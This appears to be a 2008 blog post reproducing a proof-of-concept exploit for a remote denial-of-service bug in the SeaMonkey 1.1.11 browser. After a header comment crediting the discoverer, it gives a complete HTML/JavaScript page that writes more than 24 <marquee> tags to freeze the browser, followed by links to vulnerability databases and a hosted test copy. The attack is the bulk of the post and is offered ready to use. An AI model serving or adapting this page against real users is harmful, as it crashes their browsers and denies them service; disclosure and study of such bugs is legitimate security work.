07 September, 2008

SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

<!--

Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC

Summary: Web-browser, advanced e-mail and newsgroup client,
IRC chat client, and HTML editing made simple - all your
Internet needs in one application.

Product web page: http://www.seamonkey-project.org/

Desc: SeaMonkey suffers from a remote denial of service
vulnerability (DoS), using a special html file with the
<marquee> tag multiple times (>24). Successfully exploiting
these issues allows remote attackers to cause the application
to freeze, denying service to legitimate users.

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

08.09.2008

-->

<html>

<title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title>

<head>

<body>
<br /><br /><br /><br />
<br /><br /><br /><br />
<br /><br /><br /><br />

<center>

<script type="text/javascript">

document.write("<kbd>Wooow Camel..!! WOW!</kbd>");

function t00t()
{
for(i=0; i < 25; i++)
{
document.write("<marquee>");
}
}

alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit");

var b0x = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (b0x == true)
{
t00t();
}

else {
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}

</script> </center> </body> </head> </html>

http://www.packetstormsecurity.org/filedesc/seamonkey-dos.txt.html
http://www.securityfocus.com/bid/31070

Test: http://www.zeroscience.org/codes/seamonkey_dos.html

No comments: